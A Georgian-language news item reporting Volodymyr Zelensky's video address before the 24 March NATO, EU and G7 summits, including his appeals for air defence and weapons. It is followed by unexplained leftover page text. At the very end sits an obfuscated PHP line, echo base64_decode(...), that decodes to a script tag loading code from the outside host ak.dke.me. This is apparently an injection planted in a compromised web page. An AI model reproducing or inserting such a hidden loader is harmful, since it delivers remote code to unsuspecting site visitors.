celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა , ვოლოდიმერ ზელინსკიმ მორიგ ვიდეომიმართვაში 24 მარტს ბრიუსელში დაგეგმილ სამიტებზე ისაუბრა და აღნიშნა, რომ უკრაინა დასავლეთის ქვეყნებიდან მნიშვნელოვანი მხარდაჭერის მოლოდინშია. 
 
მისივე თქმით, თითოეულ მათგანს უკრაინის უსაფრთხოებისთვის განსაკუთრებული მნიშვნელობა აქვს. 
 
"ერთდროულად სამი მნიშვნელოვანი, ნატოს, ევროკავშირისა და დიდი შვიდეულის სამიტი გაიმართება. თითოეულ მათგანს ჩვენი უსაფრთხოებისთვის განსაკუთრებული მნიშვნელობა აქვს. დარწმუნებული ვარ, ადამიანები მოახდენენ ჩვენი მხარდაჭერის დემონსტრირებას, თუმცა მთავარია ჩვენი მხარდაჭერა პოლიტიკოსებმა გამოხატონ. ყველა მათგანმა მხარი უნდა დაუჭიროს სიცოცხლისთვის ბრძოლას. ნატოსგან, დიდი შვიდეულისა და ევროკავშირისგან სერიოზულ სიგნალებს ველოდებით. 
 
რუსებმა უკვე დაიწყეს თავიანთი ინტერესების ლობირება და ეს ინტერესებია ომის შესახებ. ვიცით, რომ ისინი გარკვეულ პარტნიორებთან მუშაობენ. მათ უნდათ, რომ ომის წინააღმდეგ გამოსვლის მუხტი ჩაახშონ. სამივე სამიტზე ჩვენი მკაფიო პოზიცია დაფიქსირდება. დავინახავთ, ვინ არის მეგობარი და პარტნიორი და ვინ გაიყიდა. სიცოცხლეების დაცვა მხოლოდ ერთიანობითაა შესაძლებელი. 
 
უკრაინის ცა ამ დრომდე არ არის უსაფრთხო რუსული ბომბებისა და თვითმფრინავებისთვის. ამ დრომდე არ მიგვიღია თვითმფრინავები და ანტისარაკეტო დანადგარები, ასევე ტანკები და საზღვაო სამხედრო ტექნიკა. რუსებს ისეთ აქვთ შესაძლებლობა, ათასობით ადამიანი დახოცონ, გაანადგურონ ქალაქები. ოკუპანტები ძალიან ბევრნი არიან, მხოლოდ იმიტომ, რომ რუსეთი ამ ბინძური ომისთვის ათწლეულები ემზადებოდა. 
 
ჩვენ ცის ჩაკეტვა და შეიარაღებით დახმარება გთხოვეთ. ალიანსს ვთხოვეთ გამოეცხადებინა, რომ დაგვეხმარებოდა ტერიტორიების გაწმენდასა და მშვიდობის დამყარებაში. თავისუფალო ხალხო, არ უნდა დავუშვათ, რომ რუსეთმა ნატოში, ევროკავშირსა და დიდ შვიდეულში ვინმე გატეხოს და გადაიბიროს. ამ ყველაფერს 24 მარტს დავინახავთ." – განაცხადა ზელინსკიმ.
877
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");